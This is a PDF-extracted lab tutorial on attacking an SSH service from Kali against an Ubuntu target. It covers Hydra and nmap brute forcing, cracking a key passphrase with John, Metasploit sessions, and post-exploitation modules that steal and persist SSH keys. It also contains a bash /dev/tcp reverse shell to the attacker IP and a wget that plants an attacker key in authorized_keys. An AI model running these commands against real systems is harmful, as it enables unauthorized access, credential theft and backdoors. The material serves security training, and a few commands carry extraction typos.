www.codelivly.

com

1
Contents
Introduction ................................................................................................... 3
Lab Setup ....................................................................................................... 3
Installation ..................................................................................................... 4
Enumeration .................................................................................................. 4
Password cracking using Hydra ...................................................................... 5
Authentication using Metasploit .................................................................... 6
Running commands on remote machine ........................................................ 8
SSH Port Redirection ...................................................................................... 8
Nmap SSH brute-force script ........................................................................ 11
Enumerating SSH authentication method ..................................................... 12
Key based Authentication ............................................................................ 13
Key based Authentication (Metasploit) ........................................................ 18
Post exploitation using Metasploit ............................................................... 20
Local Port Forwarding (Password Based Authentication) .............................. 23
Local Port Forwarding (Key Based Authentication) ....................................... 24

2
Introduction
Secure Shell (SSH) is a cryptographic protocol that provides secure
communication over an unsecured network. It is a secure alternative to the non-
protected login protocols (such as telnet, rlogin) and insecure file transfer
methods (such as FTP). It's commonly used for remote server management,
secure data transfer, and other tasks requiring secure communication. This
article will demonstrate different methods to connect and exploit a SSH service
running on the target machine. By default the SSH service runs on the port 22 of
the machine.
Table of Contents

• Lab Setup
• Installation
• Enumeration
• Password cracking using Hydra
•Authentication using Metasploit
• Running commands on remote machine
• SSH Port redirection
• Nmap SSH brute-force script
• Enumerating SSH authentication methods
• Key based authentication
•Key based authentication(Metasploit)
•Post exploitation using Metasploit
• Local port forwarding (Password based authentication)
• Local port forwarding (Key based authentication)
• Conclusion

Lab Setup
In this article we are first going to setup and configure the SSH server on the
ubuntu machine and will exploit it using the SSH client on the kali linux
machine. Following are the machines:
Target Machine: Ubuntu (192.168.31.205)
Attacker Machine: Kali Linux (192.168.31.141)

3
Installation
Install the SSH server on the ubuntu machine using the following command:
apt install openssh-server

It can be noted that the SSH authenticates against the standard Unix user
database (/etc/passwd, /etc/shadow, /etc/group), so the password to login into
SSH for the user will be same which is used to login into the ubuntu machine.

Enumeration
The initial enumeration can be performed using nmap inside kali linux by
running the following command:
nmap -sV 192.168.31.205

The port 22 is open and an OpenSSH 8.9p1 Service is running on it.

4
Password cracking using Hydra
Since the authentication is password based hence the service can be brute
forced against a username and password dictionary using hydra to find the
correct username and password. After creating a username dictionary as
users.txt and password dictionary as pass.txt, the following command can
be used:
hydra -L users.txt -P pass.txt 192.168.31.205 ssh

After obtaining the username as pentest and the password as 123, the attacker
can now authenticate into the SSH service by using the command:
ssh [email protected]

5
Authentication using Metasploit
An alternate way to perform the above procedure could be done by using the
Metasploit module. The exploit multi/ssh/sshexec can be used to authenticate
into the SSH service. Here we are assuming that the attacker has compromised
the username and password already. Following will be the commands inside
the Metasploit:
use exploit/multi/ssh/sshexec set rhosts 192.168.31.205 set payload
linux/x86/meterpreter/reverse_tcp set username pentest set password 123 show targets set
target 1 exploit

6
7
Running commands on remote machine
SSH service can also be used to run the system commands on remote machine.
The following command can be used:
ssh [email protected] 'ifconfig'

SSH Port Redirection

By default, SSH uses port 22 which comes under the well known ports list.
However, we can enable the SSH service to run on any alternate port
number by performing the port redirection. The port redirection can be
performed by changing the port number in the sshd_config file.
As a root user we will first open the sshd_config file present inside the /etc/ssh
directory.
cd /etc/ssh ls -al nano sshd_config

8
The default port can be seen here as 22 in the commented line.

The port can be changed to 2222 by removing the commented line as Port 2222.

9
After saving the changes in the file, the enumeration performed using kali linux
now shows the SSH service running on the new port number which is 2222.
nmap -sV 192.168.31.205

Also, while performing the brute force using hydra, the updated port needs to
be given. Hence, the new command will be:
hydra -L users.txt -P pass.txt 192.168.31.205 ssh -s 2222

10
Nmap SSH brute-force script
There are a lot of default scripts in the nmap repository which can be used if the
port 22 is open. Here we will talk about the most common script used to brute
force the username and password. The script used to perform is the ssh-brute
nselib/data/usernames.lst
script which uses a default username file from the
and default password file from nselib/data/passwords.lst.

nmap --script ssh-brute -p 22 192.168.31.205

11
We can also give the custom username and password file by giving the flag --
script-args userdb=usernames.txt,passdb=passwords.txt.

Enumerating SSH authentication method

The SSH authentication method can be enumerated by using the ssh-auth-
methods script in nmap, the username can be given using the --script-args flag.
The following command can be used to enumerate the authentication method
used:
nmap --script ssh-auth-methods --script-args="ssh.user=pentest" -p 22 192.168.31.205

The above command enumerated that the authentication type used by the SSH
service is both publickey and password based.

12
Key based Authentication
SSH key-based authentication offers a secure and user-friendly method for
accessing remote servers without relying on passwords. This technique employs
a pair of cryptographic keys: a private key stored on your local device and a
public key saved on the remote server.
The public and private key pair can be generated using the ssh-keygen tool
inside the ubuntu machine. A passphrase is also setup for the id_rsa key such
that when the user will login using the key based authentication, a passphrase
will also be required. By default, the path to store the id_rsa and id_rsa.pub is
the .ssh folder of the user's home directory i.e., /home/pentest/.ssh/id_rsa.
ssh-keygen

Next step is copying the public key (id_rsa.pub) to the authorized_keys file in
the same directory.
The authorized_keys file on the remote server contains a list of public keys that
are authorized to access the server. By copying the public key (id_rsa.pub) to
this file, we are telling the server to trust any connection that presents the
corresponding private key.
cd .ssh

13
ls -la
cat id_rsa.pub > authorized_keys
ls

Now we can disable the password-based authentication in the

/etc/ssh/ssd_config file. There is commented line #PasswordAuthentication
which is set to yes.

14
We can change it to no and remove the comment from the line to allow the key
based authentication and disable the password-based authentication.

15
Again enumerating the service using the ssh-auth-methods script, it shows that
the support authentication method is only publickey now. Therefore a key is
required to login into the system using this service.

Let's assume a scenario where we can somehow get the private key of the
ubuntu user, then we can directly login using the key based authentication.
However, we have to give the private key read and write privilege to the
owner but we should take precaution that we are not giving the key over
permissions. To give appropriate permissions we will use the following
command:
chmod 600 id_rsa

Now we can use the private key to authenticate into the service.

16
ssh -I id_rsa [email protected]

As we had already setup a passphrase earlier while generating the private and
public key using ssh-keygen, we need to crack the passphrase. There is an inbuilt
tool in kali linux called as ssh2john which generates the password hash of the
private key. The obtained password hash can be cracked using john the ripper
tool.

ssh2john id_rsa > sshhash

john --wordlist=/usr/share/wordlists/rockyou.txt sshhash

17
The cracked passphrase is 123, now we can login using the private key into the
remote system.
ssh -i id_rsa [email protected]

Key based Authentication (Metasploit)

The above procedure can also be performed using the Metasploit framework.
The auxiliary/scanner/ssh/ssh_login_pubkey can be used to authenticate via
key.
Following options can be given as configurations to run the auxiliary/scanner:
use auxiliary/scanner/ssh/ssh_login_pubkey set rhosts 192.168.31.205 set key_path
/root/Downloads/ssh/id_rsa set key_pass 123 set username pentest exploit

18
After running the auxiliary, the user is enumerated and also a shell session is
opened. The shell session can be upgraded to the meterpreter session to get
more options. Following are the commands to upgrade an existing shell
session to a meterpreter session.

19
sessions
sessions -u 1
sessions

Post exploitation using Metasploit

After getting the meterpreter session, to create persistence the post exploit can
be used to save the private key of the user in the attacker 's machine.
The post exploit used here is the linux/manage/sshkey_persistence and the
private key is stored at the /root/.msf4/loot/ directory in the kali machine.

sessions
use post/linux/manage/sshkey_persistence
set session 1
exploit

20
Once the private key is obtained, we can again login into the SSH service using
the key based authentication as discussed in the previous section.
cd /root/.msf4/loot
mv 20240603061535_default_192.168.31.205_id_rsa_575464.txt key
chmod 600 key
ssh -i key [email protected]

There is another post exploit module which we can use to gather all the files
inside the .ssh directory of the user whose initial shell access has been taken.

21
use post/multi/gather/ssh_creds
set session 1
exploit

After the files have been obtained in the /.msf4/loot/ folder now the process
can be repeated to authenticate into the remote system using key based
authentication.

ls -al
mv 20240603061910_default_192.168.31.205_ssh.id_rsa_527520.txt key
chmod 600 key
ssh -i key [email protected]

22
Local Port Forwarding (Password Based Authentication)
Let's assume a scenario where we have an initial access and there is a web
application running on the target machine internally at port 8080, directly
we cannot access the web application in our browser. But through the Local
port forwarding supported by SSH we can access the web application on our
kali machine. Local port forwarding forwards a port on the local machine to
a port on a remote server through an SSH connection.
It can be seen below that the application running internally on the ubuntu
machine is directly not accessible from our kali machine.

From the initial shell access, it can be seen that the web application is running
internally at port 8080.
netstat -ntlp

23
SSH supports the local port forwarding functionality and hence the web
application can be accessed in the kali machine using the local port forwarding
command:
ssh -L 8080:127.0.0.1:8080 [email protected]

Local Port Forwarding (Key Based Authentication)

Here we are going to show a scenario where the initial access is taken through
reverse shell and there is a key based authentication enabled on the remote
server. We will add the public key of the kali user to the authorized_keys file

24
inside the ubuntu machine and perform local port forwarding using the SSH key
based authentication.
Using the reverse shell generator, we will use the command to get the reverse
shell from the ubuntu machine.

The command copied from above is used in the ubuntu machine.

bash -I >& /dev/tcp/192.168.31.141/443 0>&1

A reverse shell is obtained at port 443. Upon enumerating the running services,
it can be seen that a web application is running internally on port 8080.
rlwrap nc -lvnp 443
netstat -tlnp

25
Here we are generating the ssh key locally in the kali machine, since we already
have an initial access so it will be better if we copy the public key of the root user
of kali to the authorized_keys file in the ubuntu system.
ssh-keygen cd .ssh ls -al cat id_ed25519.pub > authorized_keys updog -p 80

26
27
Inside the initial shell which was obtained earlier, we will replace the
authorized_keys file inside the .ssh directory of the pentest user.
cd .ssh
wget http://192.168.31.141/authorized_keys
ls -al

Once the authorized_keys file is copied now we can use the private key of root
user inside kali machine to perform local port forward and access the web
application running at port 8080. Here we are forwarding the application port to
7777 in the kali machine.
ssh -i id_ed25519 -L 7777:127.0.0.1:8080 [email protected]

28
Conclusion SSH is a vital utility for system administrators and security experts.

Mastering
different connection techniques and following best practices ensures the secure
and efficient administration of remote systems. By employing Kali Linux to
access an Ubuntu machine, we've demonstrated the flexibility and strength of
the SSH protocol, emphasizing its significant role in contemporary network
security.

29